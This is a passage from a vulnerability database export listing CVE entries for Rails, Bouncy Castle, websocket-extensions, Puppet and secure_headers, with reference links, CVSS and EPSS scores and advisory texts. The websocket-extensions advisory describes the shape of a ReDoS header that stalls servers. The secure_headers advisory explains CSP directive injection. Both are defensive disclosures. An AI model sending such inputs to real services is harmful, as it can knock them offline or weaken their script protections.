scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://groups.google.com/g/rubyonrails-security/c/bv6fW4S0Y1c
14
reference_url https://hackerone.com/reports/413388
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://hackerone.com/reports/413388
15
reference_url https://lists.debian.org/debian-lts-announce/2020/06/msg00022.html
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2020/06/msg00022.html
16
reference_url https://lists.debian.org/debian-lts-announce/2020/07/msg00013.html
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2020/07/msg00013.html
17
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-8165
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-8165
18
reference_url https://security.netapp.com/advisory/ntap-20250509-0002
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://security.netapp.com/advisory/ntap-20250509-0002
19
reference_url https://weblog.rubyonrails.org/2020/5/18/Rails-5-2-4-3-and-6-0-3-1-have-been-released
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://weblog.rubyonrails.org/2020/5/18/Rails-5-2-4-3-and-6-0-3-1-have-been-released
20
reference_url https://www.debian.org/security/2020/dsa-4766
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.debian.org/security/2020/dsa-4766
21
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1843072
reference_id 1843072
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1843072
22
reference_url https://github.com/advisories/GHSA-2p68-f74v-9wc6
reference_id GHSA-2p68-f74v-9wc6
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-2p68-f74v-9wc6
23
reference_url https://access.redhat.com/errata/RHSA-2021:1313
reference_id RHSA-2021:1313
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:1313
fixed_packages
aliases CVE-2020-8165, GHSA-2p68-f74v-9wc6
risk_score 10.0
exploitability 2.0
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-t684-yp58-hkg8
67
url VCID-tnen-a68v-9bfk
vulnerability_id VCID-tnen-a68v-9bfk
summary In the Bouncy Castle JCE Provider version 1.55 and earlier the DSA key pair generator generates a weak private key if used with default values. If the JCA key pair generator is not explicitly initialised with DSA parameters, 1.55 and earlier generates a private value assuming a 1024 bit key size. In earlier releases this can be dealt with by explicitly passing parameters to the key pair generator.
references
0
reference_url https://access.redhat.com/errata/RHSA-2018:2669
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2669
1
reference_url https://access.redhat.com/errata/RHSA-2018:2927
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2927
2
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2016-1000343.json
reference_id
reference_type
scores
0
value 2.9
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2016-1000343.json
3
reference_url https://api.first.org/data/v1/epss?cve=CVE-2016-1000343
reference_id
reference_type
scores
0
value 0.01074
scoring_system epss
scoring_elements 0.77727
published_at 2026-04-07T12:55:00Z
1
value 0.01074
scoring_system epss
scoring_elements 0.77769
published_at 2026-04-13T12:55:00Z
2
value 0.01074
scoring_system epss
scoring_elements 0.7777
published_at 2026-04-12T12:55:00Z
3
value 0.01074
scoring_system epss
scoring_elements 0.77786
published_at 2026-04-11T12:55:00Z
4
value 0.01074
scoring_system epss
scoring_elements 0.7776
published_at 2026-04-09T12:55:00Z
5
value 0.01074
scoring_system epss
scoring_elements 0.77755
published_at 2026-04-08T12:55:00Z
6
value 0.01074
scoring_system epss
scoring_elements 0.7771
published_at 2026-04-01T12:55:00Z
7
value 0.01074
scoring_system epss
scoring_elements 0.77717
published_at 2026-04-02T12:55:00Z
8
value 0.01074
scoring_system epss
scoring_elements 0.77744
published_at 2026-04-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2016-1000343
4
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1000343
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1000343
5
reference_url https://github.com/bcgit/bc-java
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/bcgit/bc-java
6
reference_url https://github.com/bcgit/bc-java/commit/50a53068c094d6cff37659da33c9b4505becd389
reference_id
reference_type
scores
url https://github.com/bcgit/bc-java/commit/50a53068c094d6cff37659da33c9b4505becd389
7
reference_url https://github.com/bcgit/bc-java/commit/50a53068c094d6cff37659da33c9b4505becd389#diff-5578e61500abb2b87b300d3114bdfd7d
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/bcgit/bc-java/commit/50a53068c094d6cff37659da33c9b4505becd389#diff-5578e61500abb2b87b300d3114bdfd7d
8
reference_url https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3Csolr-user.lucene.apache.org%3E
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3Csolr-user.lucene.apache.org%3E
9
reference_url https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451%40%3Csolr-user.lucene.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451%40%3Csolr-user.lucene.apache.org%3E
10
reference_url https://lists.debian.org/debian-lts-announce/2018/07/msg00009.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2018/07/msg00009.html
11
reference_url https://security.netapp.com/advisory/ntap-20181127-0004
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://security.netapp.com/advisory/ntap-20181127-0004
12
reference_url https://security.netapp.com/advisory/ntap-20181127-0004/
reference_id
reference_type
scores
url https://security.netapp.com/advisory/ntap-20181127-0004/
13
reference_url https://usn.ubuntu.com/3727-1
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://usn.ubuntu.com/3727-1
14
reference_url https://www.oracle.com/security-alerts/cpuoct2020.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuoct2020.html
15
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1588721
reference_id 1588721
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1588721
16
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:bouncycastle:bc-java:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:bouncycastle:bc-java:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:bouncycastle:bc-java:*:*:*:*:*:*:*:*
17
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
reference_id cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
18
reference_url https://nvd.nist.gov/vuln/detail/CVE-2016-1000343
reference_id CVE-2016-1000343
reference_type
scores
0
value 5.0
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:N/C:P/I:N/A:N
1
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
3
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2016-1000343
19
reference_url https://github.com/advisories/GHSA-rrvx-pwf8-p59p
reference_id GHSA-rrvx-pwf8-p59p
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/advisories/GHSA-rrvx-pwf8-p59p
20
reference_url https://usn.ubuntu.com/3727-1/
reference_id USN-3727-1
reference_type
scores
url https://usn.ubuntu.com/3727-1/
fixed_packages
aliases CVE-2016-1000343, GHSA-rrvx-pwf8-p59p
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-tnen-a68v-9bfk
68
url VCID-u29q-3x9x-73da
vulnerability_id VCID-u29q-3x9x-73da
summary 
Regular Expression Denial of Service in websocket-extensions (RubyGem)
### Impact

The ReDoS flaw allows an attacker to exhaust the server's capacity to process incoming requests by sending a WebSocket handshake request containing a header of the following form:

    Sec-WebSocket-Extensions: a; b="\c\c\c\c\c\c\c\c\c\c ...

That is, a header containing an unclosed string parameter value whose content is a repeating two-byte sequence of a backslash and some other character. The parser takes exponential time to reject this header as invalid, and this will block the processing of any other work on the same thread. Thus if you are running a single-threaded server, such a request can render your service completely unavailable.

### Patches

Users should upgrade to version 0.1.5.

### Workarounds

There are no known work-arounds other than disabling any public-facing WebSocket functionality you are operating.

### References

- https://blog.jcoglan.com/2020/06/02/redos-vulnerability-in-websocket-extensions/
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-7663.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-7663.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-7663
reference_id
reference_type
scores
0
value 0.0242
scoring_system epss
scoring_elements 0.85127
published_at 2026-04-13T12:55:00Z
1
value 0.0242
scoring_system epss
scoring_elements 0.8513
published_at 2026-04-12T12:55:00Z
2
value 0.0242
scoring_system epss
scoring_elements 0.85133
published_at 2026-04-11T12:55:00Z
3
value 0.0242
scoring_system epss
scoring_elements 0.85068
published_at 2026-04-02T12:55:00Z
4
value 0.0242
scoring_system epss
scoring_elements 0.85118
published_at 2026-04-09T12:55:00Z
5
value 0.0242
scoring_system epss
scoring_elements 0.85111
published_at 2026-04-08T12:55:00Z
6
value 0.0242
scoring_system epss
scoring_elements 0.85086
published_at 2026-04-04T12:55:00Z
7
value 0.0242
scoring_system epss
scoring_elements 0.8509
published_at 2026-04-07T12:55:00Z
8
value 0.0242
scoring_system epss
scoring_elements 0.85055
published_at 2026-04-01T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-7663
2
reference_url https://blog.jcoglan.com/2020/06/02/redos-vulnerability-in-websocket-extensions
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://blog.jcoglan.com/2020/06/02/redos-vulnerability-in-websocket-extensions
3
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7663
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7663
4
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
5
reference_url https://github.com/faye/websocket-extensions-ruby
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/faye/websocket-extensions-ruby
6
reference_url https://github.com/faye/websocket-extensions-ruby/commit/aa156a439da681361ed6f53f1a8131892418838b
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/faye/websocket-extensions-ruby/commit/aa156a439da681361ed6f53f1a8131892418838b
7
reference_url https://github.com/faye/websocket-extensions-ruby/security/advisories/GHSA-g6wq-qcwm-j5g2
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements
1
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
2
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
3
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/faye/websocket-extensions-ruby/security/advisories/GHSA-g6wq-qcwm-j5g2
8
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/websocket-extensions/CVE-2020-7663.yml
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/websocket-extensions/CVE-2020-7663.yml
9
reference_url https://lists.debian.org/debian-lts-announce/2020/08/msg00031.html
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2020/08/msg00031.html
10
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-7663
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-7663
11
reference_url https://snyk.io/vuln/SNYK-RUBY-WEBSOCKETEXTENSIONS-570830
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://snyk.io/vuln/SNYK-RUBY-WEBSOCKETEXTENSIONS-570830
12
reference_url https://usn.ubuntu.com/4502-1
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://usn.ubuntu.com/4502-1
13
reference_url https://usn.ubuntu.com/4502-1/
reference_id
reference_type
scores
url https://usn.ubuntu.com/4502-1/
14
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1845978
reference_id 1845978
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1845978
15
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=964274
reference_id 964274
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=964274
16
reference_url https://github.com/advisories/GHSA-g6wq-qcwm-j5g2
reference_id GHSA-g6wq-qcwm-j5g2
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-g6wq-qcwm-j5g2
17
reference_url https://access.redhat.com/errata/RHSA-2020:4366
reference_id RHSA-2020:4366
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:4366
fixed_packages
aliases CVE-2020-7663, GHSA-g6wq-qcwm-j5g2
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-u29q-3x9x-73da
69
url VCID-ugqt-zyga-1ydy
vulnerability_id VCID-ugqt-zyga-1ydy
summary puppet: puppet server and puppetDB may leak sensitive information via metrics API
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-7943.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-7943.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-7943
reference_id
reference_type
scores
0
value 0.65366
scoring_system epss
scoring_elements 0.98474
published_at 2026-04-01T12:55:00Z
1
value 0.65366
scoring_system epss
scoring_elements 0.98487
published_at 2026-04-13T12:55:00Z
2
value 0.65366
scoring_system epss
scoring_elements 0.98483
published_at 2026-04-08T12:55:00Z
3
value 0.65366
scoring_system epss
scoring_elements 0.98485
published_at 2026-04-09T12:55:00Z
4
value 0.65366
scoring_system epss
scoring_elements 0.98488
published_at 2026-04-11T12:55:00Z
5
value 0.65366
scoring_system epss
scoring_elements 0.98475
published_at 2026-04-02T12:55:00Z
6
value 0.65366
scoring_system epss
scoring_elements 0.98479
published_at 2026-04-04T12:55:00Z
7
value 0.65366
scoring_system epss
scoring_elements 0.9848
published_at 2026-04-07T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-7943
2
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
3
reference_url https://puppet.com/security/cve/CVE-2020-7943/
reference_id
reference_type
scores
url https://puppet.com/security/cve/CVE-2020-7943/
4
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1828486
reference_id 1828486
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1828486
5
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:puppet:puppetdb:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:puppet:puppetdb:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:puppet:puppetdb:*:*:*:*:*:*:*:*
6
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:puppet:puppet_enterprise:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:puppet:puppet_enterprise:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:puppet:puppet_enterprise:*:*:*:*:*:*:*:*
7
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:puppet:puppet_server:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:puppet:puppet_server:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:puppet:puppet_server:*:*:*:*:*:*:*:*
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-7943
reference_id CVE-2020-7943
reference_type
scores
0
value 5.0
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:N/C:P/I:N/A:N
1
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
url https://nvd.nist.gov/vuln/detail/CVE-2020-7943
9
reference_url https://access.redhat.com/errata/RHSA-2020:4366
reference_id RHSA-2020:4366
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:4366
fixed_packages
aliases CVE-2020-7943
risk_score 3.4
exploitability 0.5
weighted_severity 6.8
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ugqt-zyga-1ydy
70
url VCID-utte-4yve-n7eq
vulnerability_id VCID-utte-4yve-n7eq
summary 
Directive injection when using dynamic overrides with user input
### Impact

If user-supplied input was passed into `append/override_content_security_policy_directives`, a semicolon could be injected leading to directive injection.

This could be used to e.g. override a `script-src` directive. Duplicate directives are ignored and the first one wins. The directives in `secure_headers` are sorted alphabetically so they pretty much all come before `script-src`. A previously undefined directive would receive a value even if `SecureHeaders::OPT_OUT` was supplied.

The fixed versions will silently convert the semicolons to spaces and emit a deprecation warning when this happens. This will result in innocuous browser console messages if being exploited/accidentally used. In future releases, we will raise application errors resulting in 500s.

> Duplicate script-src directives detected.  All but the first instance will be ignored.

See https://www.w3.org/TR/CSP3/#parse-serialized-policy

> Note: In this case, the user agent SHOULD notify developers that a duplicate directive was ignored. A console warning might be appropriate, for example.

### Patches

Depending on what major version you are using, the fixed versions are 6.2.0, 5.1.0, 3.8.0.

### Workarounds

If you are passing user input into the above methods, you could filter out the input:

```ruby
override_content_security_policy_directives(:frame_src, [user_input.gsub(";", " ")])
```

### References

Reported in https://github.com/twitter/secure_headers/issues/418
https://www.w3.org/TR/CSP3/#parse-serialized-policy

### For more information

If you have any questions or comments about this advisory:
* Open an issue in [this repo](https://github.com/twitter/secure_headers/issues/new)
* DM @ndm on twitter
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-5217.json
reference_id
reference_type
scores
0
value 5.8
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-5217.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-5217
reference_id
reference_type
scores
0
value 0.00521
scoring_system epss
scoring_elements 0.66844
published_at 2026-04-13T12:55:00Z
1
value 0.00521
scoring_system epss
scoring_elements 0.66876
published_at 2026-04-12T12:55:00Z
2
value 0.00521
scoring_system epss
scoring_elements 0.6689
published_at 2026-04-11T12:55:00Z
3
value 0.00521
scoring_system epss
scoring_elements 0.6687
published_at 2026-04-09T12:55:00Z
4
value 0.00521
scoring_system epss
scoring_elements 0.66857
published_at 2026-04-08T12:55:00Z
5
value 0.00521
scoring_system epss
scoring_elements 0.66808
published_at 2026-04-07T12:55:00Z
6
value 0.00521
scoring_system epss
scoring_elements 0.6681
published_at 2026-04-02T12:55:00Z
7
value 0.00521
scoring_system epss
scoring_elements 0.66772
published_at 2026-04-01T12:55:00Z
8
value 0.00521
scoring_system epss
scoring_elements 0.66835
published_at 2026-04-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-5217
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5217
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5217
3
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/secure_headers/CVE-2020-5217.yml
reference_id
reference_type
scores
0
value 4.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/secure_headers/CVE-2020-5217.yml
4
reference_url https://github.com/twitter/secure_headers
reference_id
reference_type
scores
0
value 4.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/twitter/secure_headers
5
reference_url https://github.com/twitter/secure_headers/commit/936a160e3e9659737a9f9eafce13eea36b5c9fa3
reference_id
reference_type
scores
0
value 4.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/twitter/secure_headers/commit/936a160e3e9659737a9f9eafce13eea36b5c9fa3
6
reference_url https://github.com/twitter/secure_headers/issues/418
reference_id
reference_type
scores
0
value 4.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/twitter/secure_headers/issues/418
7
reference_url https://github.com/twitter/secure_headers/pull/421
reference_id
reference_type
scores
0
value 4.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/twitter/secure_headers/pull/421
8
reference_url https://github.com/twitter/secure_headers/security/advisories/GHSA-xq52-rv6w-397c
reference_id
reference_type
scores
0
value 4.4
scoring_system cvssv3
scoring_elements
1
value 4.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/twitter/secure_headers/security/advisories/GHSA-xq52-rv6w-397c
9
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-5217
reference_id
reference_type
scores
0
value 4.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-5217
10
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1801264
reference_id 1801264
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1801264
11
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=949999
reference_id 949999
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=949999
12
reference_url https://github.com/advisories/GHSA-xq52-rv6w-397c
reference_id GHSA-xq52-rv6w-397c
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-xq52-rv6w-397c
13
reference_url https://access.redhat.com/errata/RHSA-2020:4366
reference_id RHSA-2020:4366
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:4366
fixed_packages
aliases CVE-2020-5217, GHSA-xq52-rv6w-397c
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-utte-4yve-n7eq
71
url VCID-uygc-h93v-vuh8
vulnerability_id VCID-uygc-h93v-vuh8
summary 
Deserialization of untrusted data in Jackson Databind
